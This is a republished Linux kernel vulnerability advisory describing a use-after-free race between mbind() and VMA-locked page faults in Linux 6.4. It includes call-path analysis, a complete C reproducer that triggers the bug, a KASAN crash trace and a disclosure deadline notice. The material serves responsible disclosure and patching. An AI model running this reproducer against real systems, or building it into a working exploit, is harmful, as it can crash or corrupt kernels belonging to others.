Linux 6.4 Use-After-Free / Race Condition

There is a race between mbind() and VMA-locked page faults in the Linux 6.4 kernel, leading to a use-after-free condition.

1 year ago

Packet Storm

Linux 6.4: UAF race between mbind() and VMA-locked page fault

(tested on git master, at commit 57012c57536f)

Summary:
There's a race between mbind() and VMA-locked page faults, leading to UAF.
You can quickly hit this with a straightforward reproducer that just keeps calling mbind() on one thread and causing page faults on another thread.

I'll send a suggested patch in a minute.

mbind() replaces vma->vm_policy while only protected by mmap_write_lock(), which can involve freeing the old vma->vm_policy:

sys_mbind
  kernel_mbind
    do_mbind
      mmap_write_lock
      mbind_range [for each vma in range]
        vma_replace_policy
          new = mpol_dup(...)
          old = vma->vm_policy
          vma->vm_policy = new
          mpol_put(old)
      mmap_write_unlock

VMA-locked page fault handling can allocate pages, which requires using the vma->vm_policy:

do_user_addr_fault
  lock_vma_under_rcu
  handle_mm_fault
    __handle_mm_fault
      handle_pte_fault
         do_pte_missing
           do_anonymous_page
             vma_alloc_zeroed_movable_folio
               vma_alloc_folio
                 get_vma_policy
                   __get_vma_policy
                     pol = vma->vm_policy    ***race***
                     mpol_get(pol) [conditional on MPOL_F_SHARED]
                 [do page allocation]
                 mpol_cond_put(pol)
  vma_end_read

Because of the mpol_cond_put(pol) call, it should be possible for this to manifest as a UAF write.

You can hit this race on a kernel with CONFIG_NUMA and CONFIG_KASAN very quickly (less than a second, I think) with this reproducer - you don't need an actual NUMA system for this, I've tested it in a QEMU VM without NUMA:

==============
// gcc -pthread -o mbind-vs-pf mbind-vs-pf.c -Wall
#define _GNU_SOURCE
#include <pthread.h>
#include <err.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/mman.h>
#include <linux/mempolicy.h>

#define SYSCHK(x) ({          \
  typeof(x) __res = (x);      \
  if (__res == (typeof(x))-1L) \
    err(1, "SYSCHK(" #x ")"); \
  __res;                      \
})

static char *vma;

static void *fault_thread(void *arg) {
  while (1) {
    // fault in...
    *vma = 1;
    // ... and zero the PTE again with zap_page_range_single()
    SYSCHK(madvise(vma, 0x1000, MADV_DONTNEED));
  }
}

static void mbind_vma(unsigned long policy) {
  unsigned long nmask = (1UL << 0);
  SYSCHK(syscall(__NR_mbind, vma, 0x1000, policy|0, &nmask, sizeof(nmask)*8+1, 0));
}

int main(void) {
  vma = SYSCHK(mmap((void*)0x100000, 0x1000,
        PROT_READ|PROT_WRITE|PROT_EXEC,
        MAP_ANONYMOUS|MAP_PRIVATE|MAP_FIXED_NOREPLACE, -1, 0));
  pthread_t thread;
  if (pthread_create(&thread, NULL, fault_thread, NULL))
    errx(1, "pthread_create");
  while (1) {
    mbind_vma(MPOL_BIND);
    mbind_vma(MPOL_INTERLEAVE);
  }
}
==============

This will give the following splat:

==================================================================
BUG: KASAN: slab-use-after-free in vma_alloc_folio+0x93/0x220
Read of size 2 at addr ffff888007c0e6f6 by task mbind-vs-pf/556

CPU: 3 PID: 556 Comm: mbind-vs-pf Not tainted 6.5.0-rc3-00123-g57012c57536f #304
Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS 1.16.2-debian-1.16.2-1 04/01/2014
Call Trace:
 <TASK>
 dump_stack_lvl+0x36/0x50
 print_report+0xcf/0x660
[...]
 kasan_report+0xc7/0x100
[...]
 vma_alloc_folio+0x93/0x220
 __handle_mm_fault+0x71b/0x1060
[...]
 handle_mm_fault+0xbe/0x280
 do_user_addr_fault+0x196/0x630
 exc_page_fault+0x5c/0xc0
 asm_exc_page_fault+0x26/0x30
[...]
 </TASK>

Allocated by task 555:
 kasan_save_stack+0x33/0x60
 kasan_set_track+0x25/0x30
 __kasan_slab_alloc+0x6e/0x70
 kmem_cache_alloc+0xf5/0x260
 __mpol_dup+0x72/0x1c0
 vma_replace_policy+0x20/0xb0
 do_mbind+0x379/0x510
 kernel_mbind+0x11a/0x130
 do_syscall_64+0x3b/0x90
 entry_SYSCALL_64_after_hwframe+0x6e/0xd8

Freed by task 555:
 kasan_save_stack+0x33/0x60
 kasan_set_track+0x25/0x30
 kasan_save_free_info+0x2b/0x50
 __kasan_slab_free+0x10a/0x180
 kmem_cache_free+0xaa/0x380
 vma_replace_policy+0x87/0xb0
 do_mbind+0x379/0x510
 kernel_mbind+0x11a/0x130
 do_syscall_64+0x3b/0x90
 entry_SYSCALL_64_after_hwframe+0x6e/0xd8
[...]
==================================================================

If I leave the reproducer running some more, I get other crashes, like in the KASAN internals, that suggest that the reproducer is already causing memory corruption.

In case you're curious: I found this by grepping for mmap_write_lock*() calls and looking at most of them to figure out if they do anything interesting to VMAs without taking VMA locks.

This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline.
The scheduled deadline is 2023-10-26.

Found by: [email protected]
